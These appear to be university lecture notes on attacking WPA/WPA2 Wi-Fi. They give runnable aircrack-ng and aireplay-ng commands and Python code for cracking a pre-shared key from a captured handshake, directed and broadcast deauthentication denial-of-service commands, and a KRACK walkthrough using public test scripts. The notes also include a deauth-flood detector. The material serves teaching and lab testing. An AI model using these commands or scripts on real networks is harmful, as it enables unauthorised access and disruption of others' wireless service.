WPA/WPA2 Security and Attacks

This document discusses various wireless network attacks, including: 1. Cracking WPA/WPA2 pre-shared keys with a dictionary attack, by capturing the four-way handshake and testing candidate passphrases against it. 2. Deauthentication attacks against clients, disconnecting them from the access point and producing a denial of service on the network. 3. Disassociation attacks, and how tools such as aireplay-ng can launch broadcast variants of them. 4. An overview of the KRACK attack, which exploits key reinstallation in the WPA2 four-way handshake to let an attacker decrypt network traffic and potentially replay or inject packets into ongoing connections.


Wireless Networks

Dr Ayman El Hajjar 2022-2023

WPA/WPA2
WPA (or WPA v1 as it is referred to sometimes) primarily uses the Temporal
Key Integrity Protocol (TKIP) encryption algorithm. TKIP was aimed at
improving WEP, without requiring completely new hardware to run it.
WPA2 in contrast mandatorily uses the AES-CCMP algorithm for encryption,
which is much more powerful and robust than TKIP.

Both WPA and WPA2 allow either EAP-based authentication using RADIUS
servers (Enterprise) or a Pre-Shared Key (PSK) based authentication scheme
(Personal).

WPA/WPA2 PSK is vulnerable to a dictionary attack. The inputs required for
this attack are the four-way WPA handshake between client and access point,
and a wordlist that contains common passphrases. Then, using tools such as
aircrack-ng, we can try to crack the WPA/WPA2 PSK passphrase.

An illustration of the four-way handshake is shown in the following
screenshot:

[Screenshot: the WPA four-way handshake, not reproduced here]

The way WPA/WPA2 PSK works is that it derives the per-session key, called
the Pairwise Transient Key (PTK), from the Pairwise Master Key (PMK, which in
PSK mode is simply the PSK) and four other parameters: the Authenticator
Nonce (ANonce), the Supplicant Nonce (SNonce), the Authenticator MAC address
(access point MAC) and the Supplicant MAC address (Wi-Fi client MAC). The
SSID is not an input to the PTK itself; it enters one step earlier, as the
salt when the PSK is derived from the passphrase. The temporal key portion of
the PTK is then used to encrypt all data between the access point and client.

An attacker who is eavesdropping on this entire conversation by sniffing the
air can get all of these parameters: the SSID from beacon or probe-response
frames, the two MAC addresses from the 802.11 headers, and the two nonces
from the first two handshake messages, which are sent in the clear. The only
thing he does not have is the PSK. So, how is the PSK created? It is derived
from the WPA-PSK passphrase supplied by the user, along with the SSID. The
combination of both is sent through the Password-Based Key Derivation
Function 2 (PBKDF2, using HMAC-SHA1 and 4,096 iterations), which outputs the
256-bit shared key.
In a typical WPA/WPA2 PSK dictionary attack, the attacker uses a large
dictionary of possible passphrases with the attack tool. The tool derives the
256-bit PSK from each passphrase and uses it with the other parameters
described earlier to create a candidate PTK. The first 128 bits of the PTK
(the Key Confirmation Key, KCK) are used to recompute the Message Integrity
Check (MIC) of one of the handshake packets, which is compared with the MIC
that was captured. If it matches, then the guessed passphrase from the
dictionary was correct; if not, it was incorrect.

Eventually, if the authorized network passphrase exists in the dictionary, it
will be identified. This is exactly how WPA/WPA2 PSK cracking works! The
following diagram illustrates the steps involved:

[Diagram: steps of the WPA/WPA2-PSK dictionary attack, not reproduced here]
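The derivation chain described above, carried through end to end as an added example (editor-written Python, not the lecture's code and not aircrack-ng's): PBKDF2 turns a candidate passphrase and the SSID into the PMK, PRF-512 expands the PMK with the two MAC addresses and two nonces into the PTK, and the first 16 bytes of the PTK (the KCK) recompute the MIC over handshake message 2 with its MIC field zeroed. The SSID, MAC addresses, nonces and the message 2 frame are constructed stand-ins for sniffed values, and the wordlist and the true passphrase abcdefgh are likewise made up. The MIC algorithm is chosen from the Key Information descriptor version as the standard specifies (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP).

```python
import hashlib
import hmac

# Constructed demo values (not from the lecture's capture). In a real attack the SSID
# comes from beacons, the MACs from 802.11 headers, the nonces from EAPOL messages 1 and 2.
SSID = "WirelessLab"
AP_MAC = bytes.fromhex("02aabbcc0001")    # authenticator address (AA), constructed
STA_MAC = bytes.fromhex("02aabbcc0002")   # supplicant address (SPA), constructed
ANONCE = bytes(range(0, 32))              # stands in for the nonce in message 1
SNONCE = bytes(range(32, 64))             # stands in for the nonce in message 2
# Standard RSN information element for WPA2-PSK/CCMP; message 2 carries it as Key Data.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the MIC


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK in personal mode) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, replay_counter: int, key_data: bytes,
                     mic: bytes = bytes(16)) -> bytes:
    """Constructed 802.1X EAPOL-Key frame laid out like handshake message 2."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC), pairwise key, MIC flag set
    body = (b"\x02"                                  # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")                # key length for CCMP
            + replay_counter.to_bytes(8, "big")
            + snonce                                 # Key Nonce field
            + bytes(16) + bytes(8) + bytes(8)        # Key IV, Key RSC, Key ID (zero)
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type Key


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC = first 16 bytes of HMAC over the frame with its MIC field zeroed."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    if version == 1:
        digest = hashlib.md5        # WPA / TKIP
    elif version == 2:
        digest = hashlib.sha1       # WPA2 / CCMP
    else:
        raise ValueError("descriptor version 3 (AES-128-CMAC) not handled in this example")
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(compute_mic(ptk[:16], eapol_msg2), captured):
            return candidate
    return None


def simulate_capture(true_passphrase: str) -> bytes:
    """Stand-in for the sniffed message 2: MIC computed by a client that knows the PSK."""
    ptk = derive_ptk(derive_pmk(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    unsigned = build_eapol_msg2(SNONCE, 1, RSN_IE)
    return build_eapol_msg2(SNONCE, 1, RSN_IE, mic=compute_mic(ptk[:16], unsigned))


def demo(wordlist=("password", "12345678", "abcdefgh", "letmein1")):
    msg2 = simulate_capture("abcdefgh")    # constructed "network passphrase"
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Running the block recovers abcdefgh; calling demo() with a wordlist that lacks the real passphrase returns None, which is the failure mode the dictionary-attack caveat later in this section describes. The 4,096 PBKDF2 iterations per candidate are where the time goes, and are the reason aircrack-ng and GPU crackers are limited to a few thousand to a few million guesses per second.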

In the next section, we will take a look at how to crack a WPA-PSK wireless
network. The exact same steps are involved in cracking a WPA2-PSK network
using CCMP (AES) as well.

Cracking a WPA-PSK weak passphrase

We start airodump-ng so that it captures and stores all packets for our
network. The preparatory bullets below come from the lecture's WEP
demonstration (the access point 08:7A:4C:83:0C:E0 on channel 11), but putting
the card into monitor mode and locking airodump-ng onto the target are done
the same way for a WPA/WPA2 network.

• In the reconnaissance phase, we have collected information about each
network to be tested, such as the BSSID, the channel on which it operates,
and the security protocol used. Here, we focus on a WEP-protected network and
we start capturing the frames exchanged by the AP and the associated clients
on the relevant channel.

• The two commands (airmon-ng and airodump-ng) need to be executed regardless
of whether a client is connected or not.

• We first need to identify which interface has wireless capabilities by
typing iwconfig. On my computer, the device is called wlan0; on your computer
the device may be named differently.

• We then start our wireless interface in monitor mode:

Command
sudo airmon-ng start wlan0

• If I type iwconfig, I can see that I now have wlan0mon instead of wlan0.

• We can try this attack ourselves by setting our Wi-Fi router to use WEP. We
assume that the BSSID of the AP is 08:7A:4C:83:0C:E0 and the channel is 11.
The first step is to list the surrounding networks:

Command
sudo airodump-ng wlan0mon

• This will dump the control-message traffic from surrounding wireless
networks to your screen. This is actually only needed to identify the access
point you want to attack.

• To capture the traffic of our target network, we execute airodump-ng a
second time, locked to the target BSSID and channel 11 and writing the frames
to a capture file (this produces the WPACrackingDemo-01.cap file that is
cracked later in this section).
Now, we can wait for a new client to connect to the access point so that we
can capture the four-way WPA handshake, or we can send a broadcast
deauthentication packet to force the connected clients to reconnect. We do
the latter to speed things up. aireplay-ng may again report the unknown
channel (-1) error; as before, pass --ignore-negative-one. This can also
require more than one attempt.

As soon as we capture a WPA handshake, the airodump-ng tool indicates it in
the top-right corner of the screen with "WPA handshake" followed by the
access point's BSSID.

If you are using --ignore-negative-one, the tool may replace the WPA
handshake message with a fixed channel message, so keep an eye out for a
quick flash of "WPA handshake". If we check our working directory, we should
see that a .cap file has been generated.

We can stop the airodump-ng utility now. Let's open up the capture file in
Wireshark and view the four-way handshake. The handshake packets are the
ones whose protocol is EAPOL; you can filter for them by typing eapol into
the filter bar.

Now, we will start the actual key cracking exercise! For this, we need the
dictionary of common words that you downloaded in the previous step.

We now invoke the aircrack-ng utility with the pcap file as the input and
the path to the dictionary file, as shown in the following screenshot. I have
used passwords.lst, which I have saved on the Desktop, as shown in the
terminal.

Note: the aireplay-ng bullets below are taken from the WEP demonstration,
where they generate the roughly 40,000 data frames the PTW attack needs. They
are not required for WPA/WPA2-PSK cracking, which needs only the captured
four-way handshake and the wordlist.

• We open a new tab in the terminal and run the following command:
– -b is the BSSID
– -h is the connected station MAC address. There can be several connected
stations on the access point; choose the one that is generating more traffic
– --arpreplay (or -3) is the ARP Request Replay attack option

Command
sudo aireplay-ng --arpreplay -h 98:52:B1:3B:32:58 -b 08:7A:4C:83:0C:E0 wlan0mon

• We switch to the terminal with the output of airodump-ng and we should
notice that the number of captured frames (number of Data packets) increases
quickly.

• After collecting a sufficient number of packets (that is, as we have seen,
about 40,000 for the PTW attack implemented by aircrack-ng), we can begin to
try cracking the WEP key, starting aircrack-ng in a new console tab.

• aircrack-ng is a tool that can recover the key from the frames saved in a
.cap file, using the PTW attack as the default method for WEP. For our
WPA-PSK capture we run the following command:

Command
sudo aircrack-ng WPACrackingDemo-01.cap -w /home/qa-n05/Desktop/passwords.lst

The aircrack-ng utility uses the dictionary file to try various combinations of
passphrases and tries to crack the key. If the passphrase is present in the
dictionary file, it will eventually crack it.

Please note that, as this is a dictionary attack, the prerequisite is that the
passphrase must be present in the dictionary file you are supplying to
aircrack-ng. If the passphrase is not present in the dictionary, the attack will
fail!

DOS: Deauthentication attacks

Note
For this attack, we will configure the Wireless Lab network to use Open
Authentication and no encryption. This will allow us to see the packets
using Wireshark easily.
Let's connect a Windows client to the access point. We will see the
connection in the airodump-ng screen.

Now, on the attacker machine, let's run a directed deauthentication attack
against this client. Here -0 5 sends five rounds of deauthentication frames,
-a is the access point's BSSID and -c is the client's MAC address:

Command
sudo aireplay-ng -0 5 -a E8:94:6:62:1E:8E -c AC:5F:3E:B3:3A:B0 --ignore-negative-one wlan0mon

Note how the client gets disconnected from the access point completely. We
can verify this on the airodump-ng screen as well.

If we use Wireshark to see the traffic, we will notice a lot of
deauthentication packets that we just sent over the air.

We can do the same attack by sending a broadcast deauthentication packet on
behalf of the access point to the entire wireless network. This will have
the effect of disconnecting all connected clients. Omitting -c makes
aireplay-ng address the frames to the broadcast address:

Command
sudo aireplay-ng -0 5 -a E8:94:6:62:1E:8E --ignore-negative-one wlan0mon

We successfully sent deauthentication frames to both the access point and
the client. This resulted in them getting disconnected and a full loss of
communication between them.

We also sent out broadcast deauthentication packets, which ensure that no
client in the vicinity can successfully connect to our access point.

It is important to note that, as soon as the client is disconnected, it will
try to connect back to the access point, and thus the deauthentication
attack has to be carried out continuously to have a full DoS effect.

This is one of the easiest attacks to orchestrate but has the most
devastating effect. It can easily be used in the real world to bring a
wireless network to its knees. The attack works because deauthentication and
disassociation frames are unauthenticated management frames; Protected
Management Frames (802.11w, mandatory in WPA3) authenticate them so that
spoofed frames are discarded.
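A defensive counterpart to the two commands above, added here as an editor-written example rather than lecture material: a parser for the fixed part of the 802.11 management-frame header that picks out deauthentication (type 0, subtype 12) and disassociation (subtype 10) frames, and a detector that counts them per claimed sender and flags a flood. The traffic it runs over is constructed in sample_frames() to mimic what the directed and broadcast aireplay-ng runs produce; the MAC addresses, the reason code and the alert threshold are assumptions. The parser expects raw 802.11 frames, that is, with any radiotap header already stripped.

```python
import struct
from collections import defaultdict

BROADCAST = b"\xff" * 6
MGMT, DEAUTH, DISASSOC = 0, 12, 10


def mac_str(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def parse_frame(frame: bytes):
    """Parse the 802.11 MAC header; return details for deauth/disassoc frames, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc0 = frame[0]                           # Frame Control is little-endian; byte 0 holds
    ftype = (fc0 >> 2) & 0x3                 # protocol version, type and subtype
    subtype = (fc0 >> 4) & 0xF
    if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]   # DA, SA, BSSID
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {"subtype": subtype, "dst": addr1, "src": addr2, "bssid": addr3,
            "reason": reason, "broadcast": addr1 == BROADCAST}


def build_mgmt(subtype: int, dst: bytes, src: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Constructed management frame used only to build the sample traffic below."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body   # duration, seq ctrl zero


def detect_deauth_flood(frames, threshold: int = 10):
    """Count deauth/disassoc frames per (BSSID, claimed sender); alert at or above threshold."""
    stats = defaultdict(lambda: {"count": 0, "broadcast": 0, "reasons": defaultdict(int)})
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        entry = stats[(parsed["bssid"], parsed["src"])]
        entry["count"] += 1
        entry["broadcast"] += int(parsed["broadcast"])
        entry["reasons"][parsed["reason"]] += 1
    return [{"bssid": mac_str(bssid), "src": mac_str(src), "count": e["count"],
             "broadcast": e["broadcast"], "reasons": dict(e["reasons"])}
            for (bssid, src), e in stats.items() if e["count"] >= threshold]


def sample_frames():
    """Constructed traffic: a beacon, a data frame, 3 directed and 20 broadcast deauths."""
    ap = bytes.fromhex("02aabbcc0001")        # access point, constructed
    sta = bytes.fromhex("02aabbcc0002")       # client, constructed
    reason = struct.pack("<H", 7)             # code 7, the value aireplay-ng -0 sends
    frames = [build_mgmt(8, BROADCAST, ap, ap, bytes(12)),                  # beacon, ignored
              bytes([0x08, 0x01]) + b"\x00\x00" + ap + sta + ap + b"\x00\x00" + b"data"]  # data frame
    frames += [build_mgmt(DEAUTH, sta, ap, ap, reason) for _ in range(3)]   # aireplay-ng -0 ... -c
    frames += [build_mgmt(DEAUTH, BROADCAST, ap, ap, reason) for _ in range(20)]  # no -c: broadcast
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_frames()):
        print("deauth flood:", alert)
```

A threshold of ten management frames from one sender in a short window is an assumption for the sample; in production the counter is bucketed by time, and a burst from a sender whose BSSID is also seen beaconing is the strong signal, since a legitimate access point rarely deauthenticates everyone at once.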

DOS: disassociation attacks

Try to check how you can conduct disassociation attacks against the
infrastructure using tools available in Kali. Can you do a broadcast
disassociation attack? I will leave this for you.

Attacking WPA2 using the KRACK attack

KRACK stands for Key Reinstallation AttaCKs. It is a set of vulnerabilities
publicly disclosed in October 2017 by Mathy Vanhoef and Frank Piessens of KU
Leuven. The attack exploits a flaw in how the WPA2 four-way handshake is
specified and implemented: one stage of the handshake can be retransmitted,
and accepting the retransmission makes the client reinstall a key that is
already in use, resetting the cryptographic state that goes with it. It does
not recover the passphrase or the PTK. This section covers the attack at a
theoretical level and provides some guidance on the successful identification
and exploitation of this vulnerability.

Keeping in mind what we just discussed, you may now be surprised to find
that this process is vulnerable to attack! However, the issue is not the core
cryptographic design but the handshake state machine and its implementations.
Wi-Fi is a lossy medium, so the standard lets the access point retransmit a
handshake message when it does not receive a reply, and the client must
accept the retransmission. That is the concession that makes certain stages
of the handshake replayable.

While this is not a huge issue for most of the process, message 3 is
replayable and that has a dramatic effect on the security of the overall
solution. By placing themselves in a Man-in-the-Middle (MITM) position
during the handshake (a channel-based MITM that relays frames between the
client and the real access point), an attacker can block message 4 from
reaching the access point. The access point then retransmits message 3, and a
vulnerable client reinstalls the PTK it has already started using. Installing
a key resets the packet number (the CCMP nonce) and the replay counter, so
the client encrypts its next frames with a (key, nonce) pair that was already
used, and the attacker knows exactly which nonce values are going to repeat.
Keystream reuse lets the attacker decrypt those frames; depending on the
cipher and direction it also enables packet replay and, with TKIP or GCMP,
forging of packets. In the worst case, some clients (wpa_supplicant 2.4 and
2.5, as shipped in Android 6.0) installed an all-zero key on the
retransmission, making decryption of all their traffic trivial.
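To make the nonce-reset consequence concrete, an added example (editor-written, not the KU Leuven scripts): a minimal model of a client's handling of message 3, in vulnerable and patched form, paired with a stand-in stream cipher. CCMP encrypts with AES in counter mode; the block substitutes an HMAC-SHA256 keystream (constructed, not AES) that shares the one property that matters here, namely that the same key and packet number produce the same keystream. Replaying message 3 makes the vulnerable client reinstall the temporal key and reset its packet number, so its next frame reuses a nonce; XORing the two ciphertexts cancels the keystream, and one known plaintext reveals the other. The temporal key and both plaintexts are constructed.

```python
import hashlib
import hmac
from dataclasses import dataclass


def keystream(tk: bytes, pn: int, length: int) -> bytes:
    """Stand-in for CCMP's AES-CTR keystream (HMAC-SHA256 blocks, constructed, not AES).
    Identical (tk, pn) yields identical keystream, which is the property KRACK abuses."""
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(tk, pn.to_bytes(6, "big") + block.to_bytes(2, "big"),
                        hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Supplicant:
    """Minimal model of a client's key-install behaviour for handshake message 3."""
    patched: bool
    tk: bytes = b""
    pn: int = 0            # CCMP packet number; it is the nonce for the next frame
    installed: bool = False

    def handle_msg3(self, tk: bytes) -> str:
        if self.installed and self.patched:
            # Fixed behaviour: never reinstall an already-installed key.
            return "retransmitted message 3 ignored; key already installed"
        # First (legitimate) install, and the vulnerable reinstall: key set, PN reset.
        self.tk, self.pn, self.installed = tk, 0, True
        return "installed"

    def send(self, plaintext: bytes):
        """Encrypt one frame with the current key and the next packet number."""
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.tk, self.pn, len(plaintext)))


def krack_scenario(patched: bool) -> dict:
    tk = hashlib.sha256(b"constructed temporal key").digest()[:16]
    p1 = b"GET /index.html HTTP/1.1"      # plaintext the attacker can guess or observe
    p2 = b"Cookie: sessionid=SECRET"      # plaintext the attacker wants; same length for clarity
    sta = Supplicant(patched)
    sta.handle_msg3(tk)                   # genuine message 3: first key install
    pn1, c1 = sta.send(p1)
    sta.handle_msg3(tk)                   # replayed message 3 (AP retransmits after msg 4 is blocked)
    pn2, c2 = sta.send(p2)
    # With a reused nonce, c1 XOR c2 == p1 XOR p2, hence p2 == c1 XOR c2 XOR p1.
    recovered = xor(xor(c1, c2), p1)
    return {"pn1": pn1, "pn2": pn2, "nonce_reused": pn1 == pn2,
            "recovered": recovered, "target": p2}


if __name__ == "__main__":
    for patched in (False, True):
        r = krack_scenario(patched)
        print("patched" if patched else "vulnerable", r["pn1"], r["pn2"], r["recovered"])
```

The real attack also resets the receive replay counter, which is what lets frames be replayed toward the client; the fix shipped in wpa_supplicant and other implementations is the one the patched branch models, namely refusing to reinstall a key that is already in use.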

Let us start by downloading the KRACK test scripts by typing:

git clone https://github.com/vanhoefm/krackattacks-scripts

We will have to install the dependencies that the project relies upon. This
is achieved with the following command:

apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome

Change into the created krackattacks-scripts directory and check the
contents:

cd krackattacks-scripts

In this folder you can see the body of testing scripts and the solution Mathy
and the team have put together. Before we can start playing with them,
though, we need to compile hostapd in the format that they need.

The script itself provides these instructions on first use. However, I’ve
written them here for clarity.

Change into the hostapd directory and type:

cd hostapd
cp defconfig .config
make -j 2

– This will have compiled hostapd for use in the KRACK attack PoC scripts.
– Now go back to the krackattacks-scripts folder with cd ..

The scripts recommend executing the disable-hwcrypto.sh script upon first
use. However, after using an Alfa AWUS051NH and a Kali Linux VM, I found
that this script would only crash the VM and the scripts worked regardless.
It is the user's choice whether to carry out this step, but discretion is
advised.

There are three other important files in this directory. Firstly, hostapd.conf
defines the Wi-Fi details of the network to be generated. The defaults are
testnetwork as the SSID and abcdefgh as the passphrase. Feel free to change
these to your satisfaction.

Second, the krack-test-client.py script is the script that we will be using
to identify vulnerable devices. This is the main focus of this section.

Finally, there is krack-ft-test.py, whose usage we will not cover in this
section because it applies to niche wireless devices (access points using
802.11r fast BSS transition) outside of the standard distribution.

Next, we actually get KRACKing.

We will need to disable NetworkManager to avoid conflicts, using the
following commands:

systemctl stop NetworkManager.service
systemctl disable NetworkManager.service

We can then execute the krack-test-client.py script with the following
command:

python krack-test-client.py

Now get hold of a test device, any Wi-Fi-enabled device, and connect to the
created network with the credentials described earlier or whatever you’ve
set it to.

The terminal will fill with text, but the script helpfully marks any
successful attacks in green, showing that the device is vulnerable.

The script will iterate through the potential attacks and inform the user
whether the device tested is vulnerable.
